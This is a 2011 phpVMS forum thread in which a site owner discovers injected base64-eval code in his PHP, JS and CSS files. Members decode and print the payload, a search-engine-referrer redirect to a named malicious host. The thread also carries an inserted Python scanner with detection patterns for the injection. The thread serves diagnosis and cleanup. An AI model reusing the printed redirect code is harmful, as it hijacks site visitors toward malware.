RogerB, posted February 3, 2011:
I had my provider run a malware scan on my site, they found nothing. I joined a malware site that my host uses and they are saying much of phpvms code is malware... Anyone else run into this?
mark1million (Moderators), posted February 3, 2011:
Nope, what's the site you are using?
RogerB, posted February 4, 2011:
Sitelock. If you google this, you will see. site:kesukvirtual.com It's showing regular pages as malware. Stupid.
Kyle (Moderators), posted February 4, 2011:
Roger, I got it in Google and Firefox. Someone is f***ing with everyone here at phpVMS.
Tom, posted February 4, 2011:
Roger, do you mean the whole 'This site may harm your device/computer' thing under links? That's all I see that looks abnormal, and that would be expected on the entire site if they suspect malware anywhere on the domain. And Vansers, are you getting it on your site? :s
mark1million (Moderators), posted February 4, 2011:
Guys, all the base package is OK, fine. It's when you start adding skins and other scripts without verifying what they can do or create on your server that there becomes a problem. If other links are placed anywhere on a domain to a site that has been associated as hosting malware then you will most probably get a warning message about it, which makes sense. Thing to remember is look at every script before you put it on your site or use it; if you don't understand what it can do then don't put it on.
Nabeel (Administrators), posted February 4, 2011:
Wait, what?
Kyle (Moderators), posted February 5, 2011:
> And Vansers are you getting it on your site? :s
No, I don't have a site. I mean, I've been seeing some phpVMS VAs getting that.
Kyle (Moderators), posted February 5, 2011:
> Wait, what?
You confused with Mark's post? Or my post?
RogerB, posted February 6, 2011:
Ok, I am finding this code in some of my files, I also found it in the action.php for phpvms, and I don't remember it being there before.

    eval(base64_decode("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"));
Tom, posted February 6, 2011:
Decoded as follows

    error_reporting(0);
    $nccv=headers_sent();
    if (!$nccv){
        $referer=$_SERVER['HTTP_REFERER'];
        $ua=$_SERVER['HTTP_USER_AGENT'];
        if (stristr($referer,"yahoo") or stristr($referer,"google") or stristr($referer,"bing")) {
            if (!stristr($referer,"site") or !stristr($referer,"cache") or !stristr($referer,"inurl")){
                header("Location: http://fghhghfs6fg.osa.pl/");
                exit();
            }
        }
    }
mark1million (Moderators), posted February 7, 2011:
That is a known malware site!!!!! Whatever code was in your scripts, it would appear that it has written a redirect to that URL. Not a good outcome, as you don't know where else it has written that meta redirect. Roger, that definitely does NOT belong in the action.php
RogerB, posted February 7, 2011:
I just did an update to get rid of it. I am also finding it in my forum files. I think it's all cleaned up. Question is, how did it get there?
RogerB, posted February 7, 2011:
Decode where, Tom? Wherever I see it?
Kyle (Moderators), posted February 7, 2011:
That's the main question! Roger, lock up all your files with .htaccess that Mark showed how to.
mark1million (Moderators), posted February 7, 2011:
Thing is, malware is hidden in scripts and will usually look for folders it has permissions to write to, so once you upload a js file or unknown content then potentially every file / folder it can write to it will do, to try in this case to redirect to a booby-trapped site for whatever reason. It's a right pain to get rid of and fully make sure you are free; it's a time-consuming task that must be done. In your example above anyone reaching your site from the popular search engines will be redirected to that site defined in the decode.
Kyle (Moderators), posted February 7, 2011:
Very interesting, Mark. I didn't really know any of the js triggers to work up on the file permission... So we are seeing that the virus was from the js file in Roger's skin. That's the thing, we need to smeck the flies first, but now I started skinning my own so I don't use released skins. I think we should keep an eye on that so we don't have malware or anything on the servers.
Tom, posted February 7, 2011:
Roger, I decoded the base 64. That is the code it's adding into your pages. Seeing as I don't believe phpVMS uses any base 64 you should remove EVERY instance of it.
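One way to find every instance Tom refers to, as an added example that is not part of the original posts or of phpVMS: it walks a web root, locates each `eval(base64_decode("..."))` line, and decodes (never executes) the blob to check for the search-engine-referrer redirect shown in the decoded payload. The function names, the extension list and the sample payload built in `demo()` are assumptions constructed for illustration.

```python
import base64
import re
import tempfile
from pathlib import Path

# Matches eval(base64_decode("...")) with either quote style; group 2 is the blob.
INJECTION = re.compile(
    r"""eval\s*\(\s*base64_decode\s*\(\s*(['"])([A-Za-z0-9+/=\s]+)\1\s*\)\s*\)\s*;?""")
# Traits of the decoded payload in the thread: a referrer check plus a Location redirect.
REDIRECT = re.compile(r"HTTP_REFERER.*header\s*\(\s*[\"']Location:", re.S | re.I)
# File types named in the thread (.php, .js, .css); the HTML suffixes are an assumption.
SCAN_SUFFIXES = {".php", ".js", ".css", ".html", ".htm"}


def scan_file(path):
    """Return findings for one file; blobs are decoded for inspection, never run."""
    text = Path(path).read_text(errors="replace")
    findings = []
    for m in INJECTION.finditer(text):
        try:
            decoded = base64.b64decode(m.group(2)).decode("latin-1")
        except ValueError:  # malformed base64 still counts as a finding
            decoded = ""
        findings.append({
            "file": str(path),
            "line": text.count("\n", 0, m.start()) + 1,
            "referrer_redirect": bool(REDIRECT.search(decoded)),
            "decoded": decoded,
        })
    return findings


def scan_tree(root):
    """Walk a web root and collect findings from every scannable file."""
    hits = []
    for p in sorted(Path(root).rglob("*")):
        if p.is_file() and p.suffix.lower() in SCAN_SUFFIXES:
            hits.extend(scan_file(p))
    return hits


def demo():
    """Constructed sample: one injected file and one clean file in a temp dir."""
    payload = ('$r=$_SERVER["HTTP_REFERER"]; if (stristr($r,"google")) '
               '{ header("Location: http://malicious.example/"); exit(); }')
    blob = base64.b64encode(payload.encode()).decode()
    with tempfile.TemporaryDirectory() as d:
        Path(d, "action.php").write_text(f'<?php\neval(base64_decode("{blob}"));\necho 1;\n')
        Path(d, "index.php").write_text("<?php echo 'clean';\n")
        return scan_tree(d)
```

Call `scan_tree()` with the path of the web root to list every file and line that still carries the injection.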
flyalaska, posted February 7, 2011:
Did you ever figure out how you got it?
Kyle (Moderators), posted February 8, 2011:
Hey Eddie, the virus came from the JS which was going to be released but it's off, because the JS that Roger has was a virus. Which he didn't know... My server was so messed up, and messed up over a lot of files. Took me two days to get the server online again.
RogerB, posted February 8, 2011:
I didn't get it from that java script, I don't use it on kesuk. I still have no idea how that stuff got on my server. I believe it's all gone now.
flyalaska, posted February 8, 2011:
I was there on Google Chrome. Big red page with this in it.
> Warning: Something's Not Right Here!
> www.kesukvirtual.com contains malware. Your computer might catch a virus if you visit this site. Google has found malicious software may be installed onto your computer if you proceed. If you've visited this site in the past or you trust this site, it's possible that it has just recently been compromised by a hacker. You should not proceed, and perhaps try again tomorrow or go somewhere else.
Kyle (Moderators), posted February 8, 2011:
That's weird, so your site is still malware. I hope it will be gone soon.
RogerB, posted February 9, 2011:
I believe it's all gone, I am waiting for approval from them... if not they can suck donkey nuts.
joeri (Moderators), posted February 9, 2011:
> I believe its all gone, I am waiting for approval from them...if not they can suck donkey nuts.
Don't hurt donkey's feelings
RogerB, posted February 9, 2011:
LOL... I am using Sitelock right now. Waiting for my next scan. I really don't know why I can't control the scans... so stupid...
RogerB, posted February 9, 2011:
I did find info on this malware; it was also getting into .css files. Kesuk is clean now. Only issue left was my favicon link. Weird.
RogerB, posted February 9, 2011:
Message is gone!! woo hoo. success!!!
mark1million (Moderators), posted February 9, 2011:
Great job Roger!
Kyle (Moderators), posted February 12, 2011:
Glad you're back!!! Hopefully that malware s*** will not happen.